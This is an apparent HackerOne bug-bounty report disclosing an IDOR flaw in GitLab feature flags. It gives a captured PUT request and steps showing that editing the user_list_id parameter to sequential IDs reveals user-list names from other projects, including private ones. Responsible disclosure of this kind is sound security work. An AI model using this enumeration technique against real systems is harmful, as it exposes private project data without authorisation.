IDOR-Get feature flag user list (including user IDs) of any private/public projects
HackerOne report #962408 by ashish_r_padelkar
on 2020-08-19, assigned to @kaunghtet:
Report
Summary
Hello,
It is possible to get feature flag user list of any private/public project by just supplying the 2 digit sequential ID in the request. This way we can enumerate all such feature flag user lists.
Steps to reproduce
- Go to
https://gitlab.com/<NameSpace>/project_1/-/feature_flags
2.EDIT any existing feature flag. - In
Type
Dropdown select theUser List
option and then select the available user list from your project. - Click save and capture the below request.
PUT /group_new_1/project_1/-/feature_flags/1 HTTP/1.1
Host: gitlab.com
Connection: close
Content-Length: 295
Accept: application/json, text/plain, */*
X-CSRF-Token: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: https://gitlab.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://gitlab.com/group_new_1/project_1/-/feature_flags/1/edit
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: 1
{"operations_feature_flag":{"name":"wwwwww","description":"","version":"new_version_flag","active":true,"strategies_attributes":[{"id":532,"name":"gitlabUserList","_destroy":false,"scopes_attributes":[{"id":1146,"_destroy":false,"environment_scope":"wwww"}],"parameters":{},"user_list_id":39}]}}
- Just change the value of
user_list_id
parameter in above request to any 2 digit sequential ID and send the request.
You should see the Name of the user list in the response as well as on the feature flag page when you reload. Note that this is also possible when feature flags you obtain belongs to private projects.
What is the current bug behavior?
Possible to get Feature Flag user list name of any project (including private)
What is the expected correct behavior?
If feature flag user list belongs to private project, you should not be able to get the name of it.
Output of checks
This bug happens on GitLab.com GitLab Enterprise Edition 13.3.0-pre 9bb21f0d61c
Regards,
Ashish
Impact
IDOR to get feature flag user list names from any project (including private)